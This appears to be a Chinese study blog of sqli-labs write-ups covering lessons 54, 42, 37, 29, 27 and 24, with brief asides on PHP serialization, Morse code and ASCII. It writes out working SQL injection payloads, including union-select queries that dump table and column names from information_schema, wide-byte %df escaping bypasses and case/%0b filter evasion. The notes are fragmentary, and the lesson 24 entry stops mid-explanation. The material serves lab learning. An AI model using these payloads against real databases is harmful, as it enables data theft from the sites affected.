php序列化

序列化，即将php对象转换成字符串的一种操作，目的是为了有效地保护对象，并且不丢失其类型和结构

反序列化，即将符合格式的字符串转换为php对象，这个对象的类必须在反序列化之前定义，可以通过包含一个定义该类的文件来完成

lesson54

一般的联合查询注入，但只有十次机会

?id=1

?id=1’ order by 3–+

补充知识

在sql语句中，asc是指定按升序排列的，desc是按降序来排列的

select * from users order by 1 desc;

select * from users order by 1 asc;

lines terminated by XXX 每一行以XXX为结尾

lesson42

通过检测，username这里有对当引号进行转义。而password这里没有，所以尝试对password处进行注入

在这里把type改为text就可以看到密码了

lesson37

与lesson34是同种类型的 替身 就是处理post内容，同时包含宽字节注入

因为相同的payload和方法都能用所以我就重新打一遍

�’ union select 1,database()#

�’ union select group_concat(table_name)from information_schema.tables where table_schema=database(),database()#

�’ union select 1,group_concat(column_name)from information_schema.columns where table_name=0x7573657273#

堆叠注入（stacked injection）

内容参考 mysql注入天书

lesson 29

首先是了解服务器两层架构

参考mysql注入天书之服务器

总之就是要再去搭一个jsp的平台来

同时打开phpstudy和jspstudy

通过index.jsp访问到index.php生成的页面

（buuctf里面的lesson29完全没意义，就跟lesson1一样，老坑人了，这里最好自己搭一个）

宽字节注入

宽字节：GB2312、GBK、GB18030、BIG5、shift_JIS等就是常说的宽字节，实际上只有两个字节。宽字节带来的安全问题主要是ascii字符（一字节）的现象，即将两个ASCII字符误认为一个宽字节字符。中文、韩文、日文等均存在宽字节，英文默认一个字节。

在使用PHP连接MySQL的时候，当设置”set character set client + gbk”

例子：id=1‘ 处理1' 进行编码 1%5c%27 带入sql后进行id=' and XXX此时无法完成注入

​ id=1%df 处理1%df\进行编码1%df%5c%27 带入sql后id=1運’ andXXX此时存在宽字节注入漏洞

lesson27

因为没有报错的回显所以我们采用联合查询

又因为select和union又被过滤，所以我们采用uNion和sElect

?id=11111’ %0b uNion %0b sElect %0b 1,2,3 ||’1’=’1

?id=11111’ %0b uNion %0b sElect %0b 1,database(),3 ||’1’=’1

lesson 24 second order injection(二次注入)

第一步：插入恶意数据

第一次进行数据库插入数据的时候 ，仅仅对其中的特殊符号进行转移，在写入数据库的时候还是保留的原来的数据，但是数据本身包含恶意内容。

第二步：引用恶意数据

在将数据存入数据库后，开发者认为数据是可信的，在下一次需要进行的查询的时候，直接从数据库中提取出恶意的数据，没有进行进一步的审查和处理，就会造成sql的二次注入

一开始有一个普通用户

Morse编码

摩尔斯电码(Morse code)是一种时通时断的信号代码，通过不同的排列 顺序来表达不同的英文字母、数字和标点符号。是由美国人艾尔菲德·维 尔(Alfred Lewis Vail)与萨缪尔·摩尔斯(Samuel Finley Breese Morse) 在1836年发明。由点（·）和划（-）组成。

莫斯在线编码

ascii编码

ASCII(American Standard Code for Information Interchange，美国信息交换标准代码)是基于拉丁字母的一套 电脑编码系统，主要用于显示现代英语和其他西欧语言。它是现今最通用的单字节编码系统，并等同于国际标准ISO/IEC 646。

ascii码翻译器